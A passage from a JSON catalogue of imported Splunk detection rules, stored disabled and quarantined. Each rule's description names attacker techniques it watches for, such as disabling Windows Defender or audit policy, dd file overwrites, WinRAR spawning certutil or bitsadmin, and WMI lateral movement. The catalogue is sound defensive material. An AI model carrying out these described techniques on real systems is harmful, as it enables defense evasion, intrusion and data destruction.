"license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_sql_server_critical_procedures_enabled.yml" } }, { "id": "splunk-security-content-d051d94f-c792-445e-b5d2-0b904f93ac09", "type": "detection", "name": "ESXi VIB Acceptance Level Tampering", "description": "This detection identifies changes to the VIB (vSphere Installation Bundle) acceptance level on an ESXi host. Modifying the acceptance level, such as setting it to CommunitySupported, lowers the system's integrity enforcement and may allow the installation of unsigned or unverified software.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/esxi-vib-acceptance-level-tampering.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d051d94f-c792-445e-b5d2-0b904f93ac09", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/esxi_vib_acceptance_level_tampering.yml" } }, { "id": "splunk-security-content-d05204a5-9f1c-4946-a7f3-4fa58d76d5fd", "type": "detection", "name": "Linux Stop Services", "description": "The following analytic detects attempts to stop or clear a service on Linux systems. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on processes like \"systemctl,\" \"service,\" and \"svcadm\" executing stop commands. This activity is significant as adversaries often terminate security or critical services to disable defenses or disrupt operations, as seen in malware like Industroyer2. If confirmed malicious, this could lead to the disabling of security mechanisms, allowing attackers to persist, escalate privileges, or deploy destructive payloads, severely impacting system integrity and availability.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-stop-services.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d05204a5-9f1c-4946-a7f3-4fa58d76d5fd", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_stop_services.yml" } }, { "id": "splunk-security-content-d0895c20-de71-4fd2-b56c-3fcdb888eba1", "type": "detection", "name": "Azure AD Multiple Denied MFA Requests For User", "description": "The following analytic detects an unusually high number of denied Multi-Factor Authentication (MFA) requests for a single user within a 10-minute window, specifically when more than nine MFA prompts are declined. It leverages Azure Active Directory (Azure AD) sign-in logs, focusing on \"Sign-in activity\" events with error code 500121 and additional details indicating \"MFA denied; user declined the authentication.\" This behavior is significant as it may indicate a targeted attack or account compromise attempt, with the user actively declining unauthorized access. If confirmed malicious, it could lead to data exfiltration, lateral movement, or further malicious activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1621" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-multiple-denied-mfa-requests-for-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d0895c20-de71-4fd2-b56c-3fcdb888eba1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_multiple_denied_mfa_requests_for_user.yml" } }, { "id": "splunk-security-content-d0c07718-19d1-4de2-aea9-e0ffff0ed986", "type": "detection", "name": "Windows Defender ASR or Threat Configuration Tamper", "description": "The following analytic detects the use of commands to disable Attack Surface Reduction (ASR) rules or change threat default actions in Windows Defender.\nIt leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions involving \"Add-MpPreference\" or \"Set-MpPreference\".\nThis activity is significant because adversaries often use it to bypass Windows Defender, allowing malicious code to execute undetected.\nIf confirmed malicious, this behavior could enable attackers to evade antivirus detection, maintain persistence, and execute further malicious activities without interference from Windows Defender.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-defender-asr-or-threat-configuration-tamper.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d0c07718-19d1-4de2-aea9-e0ffff0ed986", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_defender_asr_or_threat_configuration_tamper.yml" } }, { "id": "splunk-security-content-d0e6ec70-6e40-41a2-8b93-8d9ff077a746", "type": "detection", "name": "Windows BitLocker Suspicious Command Usage", "description": "This analytic is developed to detect the usage of BitLocker commands used to disable or impact boot settings. The malware ShrinkLocker uses various commands change how BitLocker handles encryption, potentially bypassing TPM requirements, enabling BitLocker without TPM, and enforcing specific startup key and PIN configurations. Such modifications can weaken system security, making it easier for unauthorized access and data breaches. Detecting these changes is crucial for maintaining robust encryption and data protection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1486", "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-bitlocker-suspicious-command-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d0e6ec70-6e40-41a2-8b93-8d9ff077a746", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_bitlocker_suspicious_command_usage.yml" } }, { "id": "splunk-security-content-d0f6a5e5-dbfd-46e1-8bd5-2e2905947c33", "type": "detection", "name": "Windows New Deny Permission Set On Service SD Via Sc.EXE", "description": "The following analytic detects changes in a service security descriptor where a new deny ace has been added.\nIt leverages data from Endpoint Detection and Response (EDR) agents, specifically searching for any process execution involving the \"sc.exe\" binary with the \"sdset\" flag targeting any service and adding a dedicated deny ace to specific groups.\nIf confirmed malicious, this could allow an attacker to escalate their privileges, blind defenses and more.\nInvestigate appropariate services and groups to determine if the behavior is malicious.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-new-deny-permission-set-on-service-sd-via-sc-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d0f6a5e5-dbfd-46e1-8bd5-2e2905947c33", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_new_deny_permission_set_on_service_sd_via_sc_exe.yml" } }, { "id": "splunk-security-content-d131673f-ede1-47f2-93a1-0108d3e7fafd", "type": "detection", "name": "Windows Process Injection In Non-Service SearchIndexer", "description": "The following analytic identifies instances of the searchindexer.exe process that are not spawned by services.exe, indicating potential process injection. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and parent processes. This activity is significant because QakBot malware often uses a fake searchindexer.exe to evade detection and perform malicious actions such as data exfiltration and keystroke logging. If confirmed malicious, this activity could allow attackers to maintain persistence, steal sensitive information, and communicate with command and control servers.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-process-injection-in-non-service-searchindexer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d131673f-ede1-47f2-93a1-0108d3e7fafd", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_process_injection_in_non_service_searchindexer.yml" } }, { "id": "splunk-security-content-d15e9bd9-ef64-4d84-bc04-f62955a9fee8", "type": "detection", "name": "ASL AWS Credential Access RDS Password reset", "description": "The following analytic detects the resetting of the master user password for an Amazon RDS DB instance. It leverages AWS CloudTrail logs from Amazon Security Lake to identify events where the `ModifyDBInstance` API call includes a new `masterUserPassword` parameter. This activity is significant because unauthorized password resets can grant attackers access to sensitive data stored in production databases, such as credit card information, PII, and healthcare data. If confirmed malicious, this could lead to data breaches, regulatory non-compliance, and significant reputational damage. Immediate investigation is required to determine the legitimacy of the password reset.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110", "T1586.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/asl-aws-credential-access-rds-password-reset.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d15e9bd9-ef64-4d84-bc04-f62955a9fee8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/asl_aws_credential_access_rds_password_reset.yml" } }, { "id": "splunk-security-content-d17dae9e-2618-11ec-b9f5-acde48001122", "type": "detection", "name": "Winhlp32 Spawning a Process", "description": "The following analytic detects winhlp32.exe spawning a child process that loads a file from appdata, programdata, or temp directories. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events. This activity is significant because winhlp32.exe has known vulnerabilities and can be exploited to execute malicious code. If confirmed malicious, an attacker could use this technique to execute arbitrary scripts, escalate privileges, or maintain persistence within the environment. Analysts should review parallel processes, module loads, and file modifications for further suspicious behavior.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/winhlp32-spawning-a-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d17dae9e-2618-11ec-b9f5-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/winhlp32_spawning_a_process.yml" } }, { "id": "splunk-security-content-d1a45d84-8dd1-4b31-8854-62b0b1d5da0b", "type": "detection", "name": "Splunk AppDynamics Secure Application Alerts", "description": "The following analytic is to leverage alerts from Splunk AppDynamics SecureApp, which identifies and monitors exploit attempts targeting business applications. The primary attack observed involves exploiting vulnerabilities in web applications, including injection attacks (SQL, API abuse), deserialization vulnerabilities, remote code execution attempts, LOG4J and zero day attacks. These attacks are typically aimed at gaining unauthorized access, exfiltrating sensitive data, or disrupting application functionality.\n\nSplunk AppDynamics SecureApp provides real-time detection of these threats by analyzing application-layer events and correlating attack behavior with known vulnerability signatures. This detection methodology helps the Security Operations Center (SOC) by:\n\n* Identifying active exploitation attempts in real-time, allowing for quicker incident response.\n* Categorizing attack severity to prioritize remediation efforts based on risk level.\n* Providing visibility into attacker tactics, including source IP, attack techniques, and affected applications.\n* Generating risk-based scoring and contextual alerts to enhance decision-making within SOC workflows.\n* Helping analysts determine whether an attack was merely an attempt or if it successfully exploited a vulnerability.\n\nBy leveraging this information, SOC teams can proactively mitigate security threats, patch vulnerable applications, and enforce security controls to prevent further exploitation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/splunk-appdynamics-secure-application-alerts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d1a45d84-8dd1-4b31-8854-62b0b1d5da0b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/splunk_appdynamics_secure_application_alerts.yml" } }, { "id": "splunk-security-content-d1ab841c-36a6-46cf-b50f-b2b04b31182a", "type": "detection", "name": "Windows AD DSRM Password Reset", "description": "The following analytic detects attempts to reset the Directory Services Restore Mode (DSRM) administrator password on a Domain Controller. It leverages event code 4794 from the Windows Security Event Log, specifically looking for events where the DSRM password reset is attempted. This activity is significant because the DSRM account can be used similarly to a local administrator account, providing potential persistence for an attacker. If confirmed malicious, this could allow an attacker to maintain administrative access to the Domain Controller, posing a severe risk to the domain's security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-dsrm-password-reset.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d1ab841c-36a6-46cf-b50f-b2b04b31182a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_dsrm_password_reset.yml" } }, { "id": "splunk-security-content-d1b088de-c47a-4572-9339-bdcc26493b32", "type": "detection", "name": "Linux Auditd Kernel Module Enumeration", "description": "The following analytic identifies the use of the 'kmod' process to list kernel modules on a Linux system. This detection leverages data from Linux Auditd, focusing on process names and command-line executions. While listing kernel modules is not inherently malicious, it can be a precursor to loading unauthorized modules using 'insmod'. If confirmed malicious, this activity could allow an attacker to load kernel modules, potentially leading to privilege escalation, persistence, or other malicious actions within the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1082", "T1014" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-kernel-module-enumeration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d1b088de-c47a-4572-9339-bdcc26493b32", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_kernel_module_enumeration.yml" } }, { "id": "splunk-security-content-d1b74420-4cea-4752-a123-9b40dfcca49a", "type": "detection", "name": "Linux Auditd Dd File Overwrite", "description": "The following analytic detects the use of the 'dd' command to overwrite files on a Linux system. It leverages data from Linux Auditd telemetry, focusing on process execution logs that include command-line details. This activity is significant because adversaries often use the 'dd' command to destroy or irreversibly overwrite files, disrupting system availability and services. If confirmed malicious, this behavior could lead to data destruction, making recovery difficult and potentially causing significant operational disruptions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-dd-file-overwrite.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d1b74420-4cea-4752-a123-9b40dfcca49a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_dd_file_overwrite.yml" } }, { "id": "splunk-security-content-d1ff2e22-310d-446a-80b3-faedaa7b3b52", "type": "detection", "name": "Linux Auditd Whoami User Discovery", "description": "The following analytic detects the suspicious use of the whoami command, which may indicate an attacker trying to gather information about the current user account on a compromised system. The whoami command is commonly used to verify user privileges and identity, especially during initial stages of an attack to assess the level of access. By monitoring for unusual or unauthorized executions of whoami, this analytic helps in identifying potential reconnaissance activities, enabling security teams to take action before the attacker escalates privileges or conducts further malicious operations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-whoami-user-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d1ff2e22-310d-446a-80b3-faedaa7b3b52", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_whoami_user_discovery.yml" } }, { "id": "splunk-security-content-d25d2c3d-d9d8-40ec-8fdf-e86fe155a3da", "type": "detection", "name": "Remote Process Instantiation via WMI", "description": "The following analytic detects the execution of wmic.exe with parameters to spawn a process on a remote system. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions and process telemetry mapped to the `Processes` node of the `Endpoint` data model. This activity is significant as WMI can be abused for lateral movement and remote code execution, often used by adversaries and Red Teams. If confirmed malicious, this could allow attackers to execute arbitrary code on remote systems, facilitating further compromise and lateral spread within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/remote-process-instantiation-via-wmi.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d25d2c3d-d9d8-40ec-8fdf-e86fe155a3da", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/remote_process_instantiation_via_wmi.yml" } }, { "id": "splunk-security-content-d25feebe-fa1c-4754-8a1e-afb03bedc0f2", "type": "detection", "name": "Linux OpenVPN Privilege Escalation", "description": "The following analytic detects the execution of OpenVPN with elevated privileges, specifically when combined with the `--dev`, `--script-security`, `--up`, and `sudo` options. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process command-line arguments and execution details. This activity is significant because it indicates a potential privilege escalation attempt, allowing a user to execute system commands as root. If confirmed malicious, this could lead to full system compromise, enabling an attacker to gain root access and execute arbitrary commands with elevated privileges.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-openvpn-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d25feebe-fa1c-4754-8a1e-afb03bedc0f2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_openvpn_privilege_escalation.yml" } }, { "id": "splunk-security-content-d290eeef-d05e-49a8-b598-72296023b87b", "type": "detection", "name": "Zoom Rare Input Devices", "description": "Detects rare input devices from Zoom logs. Actors performing Remote Employment Fraud (REF) typically use unusual device information compared to a majority of employees. Detecting this activity requires careful analysis, regular review, and a thorough understanding of the audio and video devices commonly used within your environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1123" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/zoom-rare-input-devices.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d290eeef-d05e-49a8-b598-72296023b87b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/zoom_rare_input_devices.yml" } }, { "id": "splunk-security-content-d2988160-3ce9-4310-b59d-905334920cdd", "type": "detection", "name": "Windows Get Local Admin with FindLocalAdminAccess", "description": "The following analytic detects the execution of the `Find-LocalAdminAccess` cmdlet using PowerShell Script Block Logging (EventCode=4104). This cmdlet is part of PowerView, a toolkit for Windows domain enumeration. Identifying the use of `Find-LocalAdminAccess` is crucial as adversaries may use it to find machines where the current user has local administrator access, facilitating lateral movement or privilege escalation. If confirmed malicious, this activity could allow attackers to target and compromise additional systems within the network, significantly increasing their control and access to sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-get-local-admin-with-findlocaladminaccess.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d2988160-3ce9-4310-b59d-905334920cdd", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_get_local_admin_with_findlocaladminaccess.yml" } }, { "id": "splunk-security-content-d2c14d28-5c47-11ec-9892-acde48001122", "type": "detection", "name": "Outbound Network Connection from Java Using Default Ports", "description": "The following analytic detects outbound network connections from Java processes to default ports used by LDAP and RMI protocols, which may indicate exploitation of the CVE-2021-44228-Log4j vulnerability.\nThis detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and network traffic logs.\nMonitoring this activity is crucial as it can signify an attacker's attempt to perform JNDI lookups and retrieve malicious payloads.\nIf confirmed malicious, this activity could lead to remote code execution and further compromise of the affected server.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/outbound-network-connection-from-java-using-default-ports.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d2c14d28-5c47-11ec-9892-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/outbound_network_connection_from_java_using_default_ports.yml" } }, { "id": "splunk-security-content-d2cef287-c2b7-4496-a609-7a548c1e27f9", "type": "detection", "name": "Windows Audit Policy Disabled via Legacy Auditpol", "description": "The following analytic identifies the execution of the legacy `auditpol.exe` included with the Windows 2000 Resource Kit Tools, with the \"/disable\" command-line argument or one of the allowed category flags and the \"none\" option, in order to disable a specific logging category from the audit policy. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity can be significant as it indicates potential defense evasion by adversaries or Red Teams, aiming to limit data that can be leveraged for detections and audits. If confirmed malicious, this behavior could allow attackers to bypass defenses, and plan further attacks, potentially leading to full machine compromise or lateral movement.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-audit-policy-disabled-via-legacy-auditpol.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d2cef287-c2b7-4496-a609-7a548c1e27f9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_audit_policy_disabled_via_legacy_auditpol.yml" } }, { "id": "splunk-security-content-d2d4af6a-6c2b-4d79-80c5-fc2cf12a2f68", "type": "detection", "name": "Windows Drivers Loaded by Signature", "description": "The following analytic identifies all drivers being loaded on Windows systems using Sysmon EventCode 6 (Driver Load). It leverages fields such as driver path, signature status, and hash to detect potentially suspicious drivers. This activity is significant for a SOC as malicious drivers can be used to gain kernel-level access, bypass security controls, or persist in the environment. If confirmed malicious, this activity could allow an attacker to execute arbitrary code with high privileges, leading to severe system compromise and potential data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1014", "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-drivers-loaded-by-signature.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d2d4af6a-6c2b-4d79-80c5-fc2cf12a2f68", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_drivers_loaded_by_signature.yml" } }, { "id": "splunk-security-content-d2f36034-37fa-4bd4-8801-26807c15540f", "type": "detection", "name": "WinRAR Spawning Shell Application", "description": "The following analytic detects the execution of Windows shell processes initiated by WinRAR, such as \"cmd.exe\", \"powershell.exe\", \"certutil.exe\", \"mshta.exe\", or \"bitsadmin.exe\". This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and parent process relationships. This activity is significant because it may indicate exploitation of the WinRAR CVE-2023-38831 vulnerability, where malicious scripts are executed from spoofed ZIP archives. If confirmed malicious, this could lead to unauthorized access, financial loss, and further malicious activities like data theft or ransomware attacks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/winrar-spawning-shell-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d2f36034-37fa-4bd4-8801-26807c15540f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/winrar_spawning_shell_application.yml" } }, { "id": "splunk-security-content-d2f77901-dbfa-42d9-8af7-dcd0f1a50a2f", "type": "detection", "name": "Windows PowerShell MSIX Package Installation", "description": "The following analytic detects the execution of PowerShell commands to install unsigned AppX packages using Add-AppxPackage or Add-AppPackage cmdlets with the -AllowUnsigned flag. This detection leverages PowerShell Script Block Logging (EventCode=4104) to capture the full command content. This activity is significant as adversaries may use unsigned AppX packages to install malicious applications, bypass security controls, or establish persistence. If confirmed malicious, this could allow attackers to install unauthorized applications that may contain malware, backdoors, or other malicious components.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-powershell-msix-package-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d2f77901-dbfa-42d9-8af7-dcd0f1a50a2f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_powershell_msix_package_installation.yml" } }, { "id": "splunk-security-content-d2feef92-d54a-4a19-8306-b47c6ceba5b2", "type": "detection", "name": "Kubernetes Falco Shell Spawned", "description": "The following analytic detects instances where a shell is spawned within a Kubernetes container. Leveraging Falco, a cloud-native runtime security tool, this analytic monitors system calls within the Kubernetes environment and flags when a shell is spawned. This activity is significant for a SOC as it may indicate unauthorized access, allowing an attacker to execute arbitrary commands, manipulate container processes, or escalate privileges. If confirmed malicious, this could lead to data breaches, service disruptions, or unauthorized access to sensitive information, severely impacting the Kubernetes infrastructure's integrity and security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": 